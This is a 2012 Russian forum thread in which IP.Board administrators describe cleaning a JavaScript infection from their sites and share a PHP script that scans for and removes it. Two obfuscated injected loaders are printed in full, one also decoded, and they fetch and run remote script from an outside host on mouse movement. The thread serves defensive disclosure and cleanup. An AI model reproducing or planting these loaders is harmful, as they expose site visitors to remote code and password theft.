Posted 1 марта, 201212 yr comment_700 Итак, недавно наш форум столкнулся с фреймом, который антивирусы посчитали за вирусную ссылку. Так как это мой первый опыт с вирусом на сайте/форуме, то я его обнаружил не так быстро, как мне хотелось.. Поделюс опытом удаления 'плохого' скрипта с форума. Как работал фрейм? Очень просто, при загрузке страницы, подгружающей заражённый яваскрипт, он активировался при малейшем движении курсором мышки и подгружал яваскрипт с какого-то постороннего сайта, в моём случае это был ___constructivehell.is-a-cubicle-slave.com/g/1351559130384.js, что делает этот срипт - не известно. Названиние подгружаемого скрипта генерировалось автоматически. Первое, что пришло мне на ум - сделать резервную копию форума и слить её на компьютер, а там уже разными прогами искать вирус по тексту в файлах.... Что я и сделал. Скачав копию форума, я начал искать название ссылки, которую блокировал антивирус, во всей копии с помощью программы Folder Find Text, но все мои попытки были напрасными.. Ссылка не находилась. Тогда я обратился хостеру, который подсказал мне где может находиться вирус и как его обнаружить (золотой же человек мой хостер ) То, что вирусный код содержится в яваскриптах, он сказал однозначно и уверенно. Как же мне найти этот код? Было предложено отсортировать файлы по дате изменения и уже смотреть их.. Но я пошёл другим путём, поискал в интрнете подобный случай и обнаружил, что это код кодируется в скриптах. Там же я обнаружил как именно он кодируется, и, по небольшому кусочку кода, начал поиск по резервной копии.. Результаты поиска меня просто шокировали: около 200 яваскриптов было заражено этим кодом. Вот как он выглядит в зашифрованном виде: var tdf7003="";function nabc155c58d(){var m8cb2ed7=String,f475cf=Array.prototype.slice.call(arguments).join(""),kd969a1=f475cf.substr(rc176e(),3)-573,k0c027f7a,l089296;f475cf=f475cf.substr(17);var ia0a771c7=f475cf.length;for(var k6cbf7811=0;k6cbf7811<ia0a771c7;k6cbf7811++){try{throw(k71b3b=f475cf.substr(k6cbf7811,1));}catch(e){k71b3b=e;};if(k71b3b=='}'){kd969a1="";k6cbf7811=v7fd954e3(k6cbf7811);s781897=ofbf416a(f475cf,k6cbf7811);while(s781897!='}'){kd969a1+=s781897;k6cbf7811++;s781897=oa6558(f475cf,k6cbf7811);}kd969a1-=373;continue;}k0c027f7a="";if(ded203d6a(k71b3b)){k6cbf7811++;k71b3b=f475cf.substr(k6cbf7811,1);while(k71b3b!='±'){k0c027f7a+=k71b3b;k6cbf7811++;k71b3b=f475cf.substr(k6cbf7811,1);}k0c027f7a=i61bbb(k0c027f7a,kd969a1,23);if(k0c027f7a<0)k0c027f7a+=256;k0c027f7a=k8016e5(k0c027f7a);j33797fa(k0c027f7a);continue;}b6ed78d=l85b5d784(k71b3b);if(b6ed78d>848)b6ed78d-=848;l089296=b6ed78d-kd969a1-23;if(l089296<0)l089296+=256;if(l089296>=192)l089296+=848;else if(l089296==168)l089296=1025;else if(l089296==184)l089296=1105;tdf7003+=m8cb2ed7["x66romx43x68ax72x43x6fx64x65"](l089296);}}nabc155c58d("c","998c","d","7","1","d","c1ea2","65","8","±1","4","8","±}","441","}","±19","3","±","±20","8±±","20","1±","}5","31","}±2","4","±}4","0","5}","±","171±±","1","60±±166","±","}4","3","5","}±1","95","±}5","38","}±","228±","}","5","60}±25","1","±","±2","42","±M±","2","2","3±±22","0","±}5","52","}","±2","11","±","}","43","9}","±","207","±}","5","20","}±11","±","±","2","8","±","}","5","6","0}±","2","42","±GD",">±2","42","±±","15±±","2","4","2","±}52","8","}±217","±","±26","±&","}41","4","}±1","8","0","±","±","176±","z","o","}","5","06}","±203±±2","5","5","±","}57","3","}N","}47","4","}±2","3","4±}491","}","±0","±±1±","}","438","}±","2","0","2","±","±","2","05±","±","18","7±}4","14","}","±","1","8","0","±}563}",">}","4","8","0}±2","4","8","±","±","231±","}","56","7}A}5","2","2","}±1","7±}49","8}±","0±±","0±}563}","±3±>H}","56","0}","±","25","5±}38","7","}±","1","34±R","}4","3","6}","±","1","85±","±20","3","±","±1","8","4","±","±","191","±","±1","8","5±","}495}±2","53±±24","6±±","1","90","±","±4","±","±2","53±","±","2","4","2±","}","3","75}","±","1","4","3","±","±1","26±G","}","50","2}","±","2","5","1±±","7±","±","5","±","±199±","±","2","5","5±}","4","5","9}±156","±±","14","8±}","532}","±","241±±1","9","5±","±192±","±","191","±}541","}(}","4","0","3","}±1","55","±","U]±1","69±}483","}±2","54","±±245","±","}","5","30","}±","2","5±","}","4","7","0}±","23","1±","}","4","3","4","}±18","6±t±","203±±","1","89","±","}572","}","L}55","7","}","3}","5","4","2}/","7}","49","9}±","1","9","5±±1","3±}","419}±","19","0±}","489","}±","5±}","3","9","1","}","±1","4","3","±}537}","'±2","8±}","487","}±","2","4","0","±","±1","6","9±±","19","8","±}","424","}","±","13","5","±","±","13","5±}","487","}","±169±±","17","6±","}","528","}'}","5","51}","7","-",".","/}","4","87}±","24","2","±","±24","7±}","4","11","}","±","16","2","±±","1","61","±d","}404","}","_V±","1","7","7","±C","@","??}","5","2","0}","!","}","5","1","7}","±1","6","±","±","21","±","±","1","1","±","}4","2","2","}±183","±","}5","69}R}4","5","5}","±","1","5","1±","±225","±","±","2","26±}5","35","}3}","5","2","6}±","2","2±","±","28","±±1","7","±","±","2","3±","}472","}","±","1","54±","±","183","±±","15","4±","}","46","0}","±1","58±}4","28}±1","3","7±}","55","3","}","±216±","}","37","8}&","}4","07}B","}457","}±232","±","xu","}506}","±165±","±0","±","}5","2","0}±2","5","±±13±","}5","2","4","}#±27±","}","50","8}±3±","}","4","6","4","}±","2","2","4±","}","397}±","1","63±}41","7}q","±","178±","}","56","9","}I}","45","2","}±","211","±±2","13","±±","2","1","9","±±2","1","7","±","}52","9","}","±24±","±3","2","±")±24","±","±","2","1","1±}","4","57}","±","1","68±±","139±","}468","}","±220","±}","45","8}","±","2","2","5±±2","18±","±","2","07","±","}3","93","}","±","159","±","}","42","1","}","±","17","6±±","182","±±1","81±","o","}416}","kb","±18","9±","O","}431","}","[","Z}","4","5","3}p","±20","8±","}","38","0","}","±132","±","}","5","7","0","}","±252","±}","4","9","4","}±184","±}432","}±","2","01","±","}","55","9}",":","?5}","4","36}±","1","9","7±","}434","}","±20","3±","±","130","±}4","48}±","21","8±}","43","3}","±20","4±","}","3","9","1}±","1","63±","±1","43±","±1","49","±}484","}±","231","±}","4","55","}","±2","0","8±±","137±","±1","6","6","±}","464}±","17","5±}54","6","}±1","±}398","}","P","}5","15}","±2","1","3","±","±2","0","6","±","±1","9","7±}","56","3","}","P}","50","9","}±","1","7","2","±}4","7","9}±","1","39±","±138±","}414","}","I}5","5","0","}±","2","09","±","}421","}±1","90","±±1","76±","}","5","1","3}±","17","±","}","3","78","}","±1","2","8±}4","4","4","}","±2","0","5","±}56","3}","L±3±","}48","6","}±","0","±","}","53","1","}.}","4","97","}","±1","3","±","}436","}±1","8","8±±194","±","±","1","8","3","±","}","5","09}±","6±}","3","86","}D","}4","1","8}±1","2","9±","}","5","50","}±23","2","±±","2","4","9±","}","403","}p","}4","3","9}f","}3","99","};",":}39","6","}7}3","82}",")","}","46","4}","±","232","±±2","1","1±±","22","8","±","}","4","3","4","}t","}555","}5","}4","43}","±1","94±±1","90","±","±19","3","±}3","9","4","}L","}4","8","5","}","±","19","6±±167±±235","±±","24","6","±±2","3","4±","}","55","4","}A}46","6","}±22","5±±21","7±","}4","01","}","±","1","6","1±}5","2","2","}±32","±","±218","±}55","5","}","4","}","4","71}","±222","±","±2","37±","±19","0±","±","2","29±}","429}","±18","0±}5","3","0}!±","2","5±"('±","24","6","±","-±","8±}","50","7}","±","2","54±±4","±","}","53","5}","±","7±","±26±","}","389}","±","1","48±±14","0","±}44","3","}±1","33±}","45","4}±143±","±208","±±20","5±±20","1±±","2","0","4±","±","1","4","3±","}","39","7}","X±13","8","±}405","}","g","}5","5","3}(}","46","8}±1","7","7","±","±13","1","±±","1","2","8±","}4","1","4","}","I","}","503}±","1","6","2","±±1","62","±","}49","0","}","±2±}","4","67}±","2","1","4","±","±2","31±","±","1","4","9","±}472}","±","2","3","7±±","22","1±","±","2","36±±","227","±","}4","16}±","17","8±±1","82±b±1","2","7±","}40","9","}","[±","159±}","5","1","4","}","±","1","9","±","}","5","0","6}","±","2","55","±}3","7","8}","±","14","5","±±","1","37±}","446","}","±","19","7","±±2","0","6±±212","±±1","4","2±","±195","±","±2","10","±}538}","!}","4","3","0}","±","1","7","7±}","4","55}±","2","2","1","±","±","20","6","±}528}±","247±","±30","±}52","2","}±","1","7","±","±2","5±±1","7±","±2","6","±","}","5","65","}","K","±2","5","5±","}5","2","4","}±213","±!}4","14}±","16","3±±1","7","8±}","527}±2","6","±","}","423","}","±1","85±","}5","31","}",")","}5","04}±","19","3","±","±","19","5","±±21","3","±","}","5","0","3}±1","66±","}","4","4","5","}","i","}499}","±","158","±±1","58±","±","15","8","±}","3","9","0","}±","155±±1","3","9±","}54","8}8}42","4}±1","79","±±","186","±}","547}","9","}5","52","}±","2","4","8","±>","}566","}QH=}511","}","±","193±±","222","±}3","9","2}J","Q±158","±","±1","4","3","±±16","2±}","3","8","6}","±","1","52±","}44","6","}±","143","±}45","4}±21","0±","±2","01±","±","2","2","2","±","±","2","0","1±","±2","1","9","±±2","0","3±}49","0","}","±","254±","}538}%}376","}","±1","3","8","±","}49","9","}","±","9±","±1","88±","±","208","±","±","1","62±","±","1","59±±1","58","±","}","48","7","}±","14","6","±±1","4","6","±}384","}±","1","49±","±","13","3","±±1","48±","}","48","2}±","2","37±}","55","3};","?}55","2","}±248","±","98","}4","4","4","}","±","2","08±±","19","5±","±191","±","±1","94","±}5","6","8}","S","}","522","}","±","3","1±","}56","4","}","J7","}","54","4","}","6","}3","82","}","±13","3","±±","131","±±1","36","±±","1","29±","±1","4","2","±±1","35","±","±133±","@]}","5","25","}±","20","7±±","21±","}5","45}81","&","}4","26","}","±","1","9","2±","}","39","9}","±","1","5","4","±","±","160±}","5","4","0},","±","2","22","±","}51","2}±2","02±}","53","3}±2","24±}377};±","1","50","±","}47","6}","±","139","±}","382}","*",")}","5","6","5}","±2","2","4","±","±","2","2","4±","±","2","24±@}43","0}","±","1","8","2","±}5","5","9","}±","2","4","1","±","}","525","}","±215±}","49","1","}±","1","±}","504","}","±2","±","}4","00","}±1","55","±}","4","62}±2","2","7±±15","8","±±22","6±±213±","}5","3","3}","±24","±","}389}","±139","±","}4","16}","±187","±","±1","49±","±1","82","±}","4","15","}","±1","62","±±","181±","}47","7}","±","2","28","±±","1","59","±}","4","35}±1","4","6±}37","5}V","}","4","09","}[","}563}±","252","±}4","18}","±","1","6","7±","}5","4","2","}/-}5","62","}","D@}3","8","9","}","±","140","±}5","2","4}",""±1","9±","}","50","0}±","1","8","9±±191","±}405}","W","±","178±","DA@@","@","}4","2","9","}XX±19","8","±}","5","22}","±","21","±","±2","6±","}5","5","1","}-}","48","1}±242±","}56","6}O","}514}","±","210","±","±2","8±","±29","±}4","75}±2","4","7±}","4","4","3","}±","19","5","±±201±}","39","8","}","±","1","45","±","}","447}±2","0","0±}","5","5","8}","±2","4","0±","±1","3","±±","2","4","0","±","}","41","3","}q","}43","9","}","±","148±","}","5","0","0}","±16","3","±}","4","42}","f}","45","2}","ooo","}","517","}","±","1","76","±}5","27}.","}","491}±15","4±","±151±","±15","0","±","}41","5}","J","J","}5","30}","1","}","549","}","±2","±±2","12±±","209±","}","5","4","7","}","±","2","06","±±2","0","6","±","±","2","06","±","8","(}4","9","9}±7±}","4","3","7","}","±","1","92±","}5","70}L","}","45","5","}±","2","21±±","1","51±}49","1","}±252±","}","5","5","7}=}48","3}±","24","1±±24","4","±","}4","9","6","}","±","243","±","±","246","±}","5","2","6","}","±2","08±±237±±2","08±±","22±}","430","}","±","1","9","7±}","45","9","}±2","1","9","±","±208±","}","3","8","9}","±155±","±","1","4","4","±","±","1","50±}5","70}","J","±","4","±±","5","±}","5","4","1}","±","2","23±}","397","}±170±<}4","1","0}F","}","49","7","}","±1","56","±±","1","5","6","±","±1","5","6±±1","56±","±","10","±}","4","33}","±","18","8±","}","5","5","4","}",":","}4","4","2","}","±19","2","±","}53","4}'","/","±230","±}","415","}±","1","85","±","}474}±2","45±±24","6","±","±","22","6±±","23","2","±","±2","21±","±2","27±±156","±}","47","5","}±1","8","6","±±1","5","7±","}","420}x","}","380}Y+","(","}","4","73}","±","132","±±","1","32","±±","1","3","2","±","}37","6","}±1","51±}4","2","9}±138","±Y","}","3","78}","%%}449}l","}4","62","}","±","22","7","±","}","3","80}","±","129","±","}","429}","±19","3","±}44","5","}±200","±","±","20","7","±±2","11±}","41","2}l","}","48","7}±","25","2±","±","251±","}","488}","±","2","3","7","±","±17","0","±","}3","77}X","}","554}±236±","A>","}4","9","2","}","±","25","0","±","±","1","74","±±18","5","±","±1","7","4±","±21","9","±±","2","3","9±±2±","}","4","5","8","}±","2","12","±}","5","42}","±","2","3","8","±2","!}","5","31}","#","}42","4","}","±","1","7","4±±1","85","±±1","8","3","±r","}5","73","}±8±","}4","74}","±","17","0","±","±","2","4","0±}","5","26}±","3","1±","}44","4","}","±","177","±±","2","1","0±±","208±","±","19","9","±}","4","3","2}","±","1","9","2","±","±","1","8","5","±}","41","3","}","g}","5","1","2","}","±20","3±","}4","9","7","}","±","1","93±}","4","13}","±","1","7","8","±±1","80","±","±1","61","±","}","3","9","4}","±","1","5","9±","}","380","}±","146","±}4","9","7}±5±","±2","5","2±}","3","9","3","}","±","1","5","3","±}44","0","}±","1","93","±}4","65","}±","15","5","±","±166","±","±","1","56","±}4","59}±1","41","±","±","1","52","±","±","14","1±","±1","4","8±}","395","}","[","}46","9}","±","2","25","±}","411","}","±1","76","±}","4","9","8}±1","8","7","±","±","207","±}","5","5","9","}±","2","2","2","±}5","6","3}±","22","3±","±","22","2","±±2","22±","}53","6","}","±","195","±}5","5","9}","9}4","7","1}±2","22±","±218±","±2","21","±}5","50","}±24","6±",")}","49","8}","±","4","±","±4","±","}52","7}±2","2","±","±3","1±","±21","±±","2","44","±","±25±±","26","±±","29±","}5","3","9","}!","±2","29","±","}","5","1","2","}","±","2","1±}","5","3","0","}","±23±&","}4","71","}","±226±}","49","9}","±","5","±}","43","0","}±","196±","}47","3}±16","4±±1","82±","±1","3","6","±±1","3","3±","±","1","32±}","4","17","}","L±","192","±PML","±","1","9","2±","±126±","}","4","80}±1","43","±","±","14","0","±}375","}","±","1","50±","}397","}X}","498","}","±","188","±","±18","9±","}50","7","}","±216","±","");eval(tdf7003);function rc176e(){return 14;}function v7fd954e3(y328166){return ++y328166;}function ofbf416a(c68a9f9,c2c81e){return c68a9f9.substr(c2c81e,1);}function oa6558(xeea275f0,y47011595){return xeea275f0.substr(y47011595,1);}function k8016e5(lb3daa13){if(lb3daa13==168)lb3daa13=1025;else if(lb3daa13==184)lb3daa13=1105;return (lb3daa13>=192 && lb3daa13<256) ? lb3daa13+848 : lb3daa13;}function ded203d6a(k835fa24e){return k835fa24e=='±';}function i61bbb(o764cf3,s3c613,g05e26cf8){return o764cf3-s3c613-g05e26cf8;}function j33797fa(t4c415){var m8cb2ed7=String;tdf7003+=m8cb2ed7["x66romx43x68ax72x43x6fx64x65"](t4c415);}function l85b5d784(vad933){return (vad933+'')["chax72x43odex41t"](0);} А вот как в расшифрованном виде: (function() { var url = '__constructivehell.is-a-cubicle-slave.com/g/'; if (typeof window.xyzflag === 'undefined') { window.xyzflag = 0; } document.onmousemove = function() { if (window.xyzflag === 0) { window.xyzflag = 1; var head = document.getElementsByTagName('head')[0]; var script = document.createElement('script'); script.type = 'text/javascript'; script.onreadystatechange = function() { if (this.readyState == 'complete') { window.xyzflag = 2; } }; script.onload = function() { window.xyzflag = 2; }; script.src = url + Math.random().toString().substring(3) + '.js'; head.appendChild(script); } }; })(); [/code] [/spoiler] Пришлось очищать каждый скрипт от этого кода. У меня сразу же возникло пару вопросов: Как он мог проникнуть в скрипты на сервере? Кто его туда записал? По моему [u]не профессиональному[/u] мнению, я могу лишь предположить, что у меня просто угнали данные для доступа к FTP, что можно проверить по логам, было ли там копирование, а затем замена практически всех яваскриптов на форуме... Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/ Share on other sites Больше вариантов
3 марта, 201212 yr comment_787 Сталкивался много раз с этой проблемой на булке, но до этого момента, кстати, не замечал, что бы на IPB было похожее. Касперыч мой ругался на вирусяку и не давал её загрузиться в браузере. Картинко: Данный зверюга ворует ваши пароли, хранящиеся в памяти браузера, не важно когда вы их ввели или сохранили в памяти браузера. Скрипт заливается очень просто (как это было с булкой) просто создаётся новый юзер "с скрытыми символами" XSS атака, а также сообщением или картинкой. Бороться можно. Достаточно ограничить доступ к файлам и папкам (непосредственно на фтп выдать нужные права для файлов - ТОЛЬКО ЧТЕНИЕ) Ну или некоторые мои знакомые писали скрипты, которые каждый час проверяли изменение файлов на фтп Так тоже можно ^^ И кстати, Паш, настрой права у моей группы Я в чате писать не могу :D Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=787 Share on other sites Больше вариантов
3 марта, 201212 yr Author comment_789 Будем знать) Права поправил! Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=789 Share on other sites Больше вариантов
14 апреля, 201212 yr Author comment_2681 Если у кого возникла такая же проблема с сайтами, могу скинуть скрипт, который автоматом удалит вирус из всех яваскриптов.. PS: была обнаружена другая модификация данного вируса.. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=2681 Share on other sites Больше вариантов
18 мая, 201212 yr comment_4578 похожая беда на моем форуме, изменил пароли на фтп и все остальные, удалил свой фтп клиент, запретил браузеру хранить пароли, перезалил все файлы форума и дополнений. но всёже иногда попадаеться постороний код в конце js файлов (видимо какието устаревшие файлы от старых версий форума). но код у меня был другой, кажеться начинался с try, если опять встречу, выложу. в логах фтп нашел этот ip: 62.122.79.1 скиньте плз скрипт и какие права на папки и файлы лучше поставить так чтобы потом небыло проблем в работе форума. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=4578 Share on other sites Больше вариантов
18 мая, 201212 yr Author comment_4579 Вот скрипт: <? /* ---------------------------------------------------------------------------------- dScaner Class - START ---------------------------------------------------------------------------------- */ /* * * Класс - dScaner для сканирования директорий на наличие вредоносного кода в * указанных типах файлов * * Разработчик: Денис Ушаков * Дата разработки: 03-04-2012 * Версия разработки: 0.0.3 * */ Class dScaner { // преобразуем входной параметр в массив // $get_str - список параметров // $separator - разделитель параметров в списке function request($get_str, $separator) { if (isset($get_str) && !empty($get_str)) { // эксплоадим строку в массив и возвращаем его $obj = explode($separator, $get_str); return $obj; } else { return false; } } /* * * Функция поиска в файлах вхождения заданной строки: * * $this->find($path, $files_allowed, $requested_string); * * $path - путь до директории, от которой отталкиваться при сканировании * $files_allowed - список файлов, которые подвергаются сканированию * $requested_string - строка поиска * */ function find($path = './', $files_allowed, $requested_string) { // исключаемые ссылки на директории и файлы, которые будут игнорироваться $dir_disallow = array('.', '..', '.htaccess', '.git'); if(is_dir($path)) { $temp = opendir($path); while (false !== ($dir = readdir($temp))) { if ((is_dir($path . $dir)) && (!in_array($dir, $dir_disallow)) ) { // если директория - сканируем её $sub_dir = $path . $dir . '/'; $this->find($sub_dir, $files_allowed, $requested_string); } elseif ((is_file($path . $dir)) && (!in_array($dir, $dir_disallow)) && (strpos($dir, $files_allowed) == true) && (strpos($dir, '_BACKUP') == false) ) { // Если файл // получаем полный путь до него $in_dir_file = $path . $dir; // считываем файл в строку $temporary_file = file_get_contents($in_dir_file); // флаг найденного вхождения искомой строки $file_founded = false; // разбиваем файл на строки $tf_strings = explode("n", $temporary_file); // обрабатываем каждую отдельно foreach ($tf_strings AS $item) { $item = strval($item); // если в строке есть вхождения искомого запроса if (strpos($item, $requested_string) !== false) { $file_founded = true; } } // если в файле найдена строка if ($file_founded) { // выводим путь до файла в котором найдено вхождение print "<span style='display:block; padding:5px; border:1px solid #1f4f18; background-color:#d5f5ce; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>" . $in_dir_file . " - в файле обнаружена искомая строка. </span> "; } } } closedir($temp); } } /* * * Функция сканирования вредоносного кода: * * $this->scan($path, $files_allowed, $requested_string); * * $path - путь до директории, от которой отталкиваться при сканировании * $files_allowed - список файлов, которые подвергаются сканированию * $requested_string - строка, по которой определяется наличие вредоносного кода * */ function scan($path = './', $files_allowed, $requested_string) { // исключаемые ссылки на директории и файлы $dir_disallow = array('.', '..', '.htaccess', '.git'); if(is_dir($path)) { $temp = opendir($path); while (false !== ($dir = readdir($temp))) { if ((is_dir($path . $dir)) && (!in_array($dir, $dir_disallow)) ) { // если директория - сканируем её $sub_dir = $path . $dir . '/'; $new_parent_dir = $path . $dir; $this->scan($sub_dir, $files_allowed, $requested_string, $new_parent_dir); } elseif ((is_file($path . $dir)) && (!in_array($dir, $dir_disallow)) && (strpos($dir, $files_allowed) == true) && (strpos($dir, '_BACKUP') == false) ) { // Если файл // получаем полный путь до него $in_dir_file = $path . $dir; // считываем файл в строку $temporary_file = file_get_contents($in_dir_file); // флаг бекапа файла $create_backup = false; // разбиваем файл на строки и считываем каждую отдельно $tf_strings = explode("n", $temporary_file); // индекс строки файла $str_index = 0; // каждую строку обрабатываем отдельно foreach ($tf_strings AS $item) { $item = strval($item); if (strpos($item, $requested_string) !== false) { // если в строке есть вхождения искомого запроса // флаг бекапа файла, в котором найден вредоносный код $create_backup = true; // удаляем всю строку с вредоносным кодом unset($tf_strings[$str_index]); } $str_index++; } // создаём бэкап if ($create_backup) { // меняем права в папке в которой находимся чтобы иметь возможность писать в неё chmod($path, 0777); // формируем имя БЭКАПа файла $temp_file_backup = $in_dir_file.'_BACKUP'; // сохраняем БЭКАП файла рядом с исходным file_put_contents($temp_file_backup, $temporary_file); // собираем очищенный файл в строку $scanned_file = implode("n", $tf_strings); // сохраняем очищенный файл if (file_put_contents($in_dir_file, $scanned_file)) { // перезаписали удачно print "<span style='display:block; padding:5px; border:1px solid #1f4f18; background-color:#d5f5ce; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>" . $in_dir_file . " - Файл очищен. (+ BACKUP) </span> "; } else { // перезапись не удалась print "<span style='display:block; padding:5px; border:1px solid #822121; background-color:#ea7575; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>".$in_dir_file ." - Файл НЕ очищен. </span> "; } // меняем права в папке в которой находимся обратно на 755 chmod($path, 0755); } } } closedir($temp); } } /* * * Функция восстановления БЭКАПОВ файлов * * $this->restore_backups($path, $files_allowed); * * $path - путь до директории, от которой отталкиваться при восстановлении * $files_allowed - список файлов, которые подвергаются восстановлению * */ function restore_backups($path = './', $files_allowed) { // исключаемые ссылки на директории и файлы $dir_disallow = array('.', '..', '.htaccess', '.git'); if(is_dir($path)) { $temp = opendir($path); while (false !== ($dir = readdir($temp))) { if ((is_dir($path . $dir)) && (!in_array($dir, $dir_disallow)) ) { // если директория - сканируем её $sub_dir = $path . $dir . '/'; $this->restore_backups($sub_dir, $files_allowed); } elseif ((is_file($path . $dir)) && (!in_array($dir, $dir_disallow)) && (strpos($dir, $files_allowed) == true) ) { // Если файл // получаем полный путь до него $in_dir_file = $path . $dir; if (is_file($in_dir_file.'_BACKUP')) { // БЭКАП существует, получаем его содержимое $temporary_file_from_backup = file_get_contents($in_dir_file.'_BACKUP'); // восстанавливаем бэкап файла if (file_put_contents($in_dir_file, $temporary_file_from_backup)) { // удаляем бэкап unlink($_SERVER['DOCUMENT_ROOT'].'/'.$in_dir_file.'_BACKUP'); // бэкап восстановили print "<span style='display:block; padding:5px; border:1px solid #1f4f18; background-color:#d5f5ce; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>".$in_dir_file ." - восстановлен. </span> "; } else { // бэкап НЕ восстановили print "<span style='display:block; padding:5px; border:1px solid #822121; background-color:#ea7575; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>".$in_dir_file ." - НЕ восстановлен. </span> "; } } } } closedir($temp); } } } /* ---------------------------------------------------------------------------------- dScaner Class - END ---------------------------------------------------------------------------------- */ ?> [/CODE] [/spoiler] но код у меня был другой, кажеться начинался с try, если опять встречу, выложу. Выкладывай, посмотрим что у тебя за код.. Права изменять бесполезно - злоумышленник при внедрении вредоносного кода имеет доступ к файлам через FTP. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=4579 Share on other sites Больше вариантов
18 мая, 201212 yr comment_4580 вот этот код: try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$51$48.5$52.5$50$49$57.5$55$49$55.5$22$55$54.5$49$60$54.5$54$49.5$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);} 